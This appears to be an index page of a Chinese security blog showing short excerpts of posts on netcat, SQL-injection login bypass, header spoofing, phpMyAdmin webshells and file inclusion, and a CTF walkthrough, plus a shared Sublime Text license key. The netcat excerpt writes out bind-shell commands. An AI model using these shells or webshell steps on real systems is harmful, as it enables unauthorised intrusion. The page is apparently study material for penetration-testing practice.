Netcat基本用法总结 NOTES
0x01基础使用
靶机创建一个服务端:
nc -nvlp [端口]
攻击机开启监听:
nc [服务端IP] [端口]
0x02获取shell
正向shell
靶机创建一个服务端:
#Windows
nc -nvlp [端口] -e cmd.exe
#Linux
nc -nvlp [端口] -e /bin/sh
攻击机开启监听:
nc [服务端IP] [端口]...
Kali Liunx更新源-国内Kali源 NOTES
0x01编辑kali的更新源地址文件
sudo vim /etc/apt/sources.list
0x02添加下面的源地址(选择几个增加即可)
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu...
Kali Liunx下利用openssl进行md5加密 NOTES
0x01 MD5加密
交互式输入
[root@kali ~]# openssl
OpenSSL> md5
123456
(stdin)= f447b20a7fcbf53a5d5be013ea0b15af
OpenSSL> md5
123456(stdin)= e10adc3949ba59abbe56e057f20f883e #M...
Sublime Text 3 安装 注册 汉化 NOTES
0x01安装
进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。
0x02注册
运行Sublime,先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。
----- BEGIN LICENSE -----
Member J2TeaM
Single ...
简单分析登陆界面SQL注入 实现登录绕过 NOTES
0x01适用条件
1.这个登陆系统用如下SQL语句来进行登陆校验
select * from user where username = '$username' and password='$passowrd'
这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。
2.系...
X-Forwarded-For,伪造HTTP请求端真实IP NOTES
关于HTTP X-Forwarded-For 介绍
需要伪造请求端为127.0.0.1,直接burpsuite抓包,然后增加字段X-forwarded-for: 127.0.0.1,提交即可
例如下面有一道CTF题,前面部分就是利用伪造xforwardedfor来实现访问的,如下,访问后提示没有访问对象的权限,对象受保护或服务器不可读。
第一时间就想到了,...
phpMyAdmin利用日志文件get webshell PHP
条件:需要使用root登陆phpmyadmin
0x01开启日志
进入phpmyadmin后,选择变量
1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志
set global general_log='on'
2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可...
phpMyAdmin4.8.1 任意文件包含漏洞分析与利用 PHP
0x01影响版本
phpmyadmin 4.8.1 (需要登陆才能利用)
复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip
0x02漏洞分析
index.php 55-63行代码
if (! empty($_REQUEST['targe...
解决Windows Server 2019服务器管理器 安装.net framework 3.5失败 Windows
此方法同样适用于Windows Server 2008/2012/2016
Windows server安装.net,只能通过服务器管理器安装,但是通过服务器管理器安装会安装失败。
解决方法:
1.下载一个原版系统安装镜像,打开系统镜像进入sources选择sxs文件夹,把整个sxs文件夹复制到c盘下面。
2.通过服务器管理器“管理-添加角色功能”,选择....
JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记 SECURE
JIS-CTF-VulnUpload靶机共有5个Flag,找到它们!
0x01初步探测
靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.1.107
nmap扫描了下靶机端口,只有80端口跟22端口开着
0x02账号爆破
那就访问http://192.168.1.107先看看吧,跳转到了login.ph...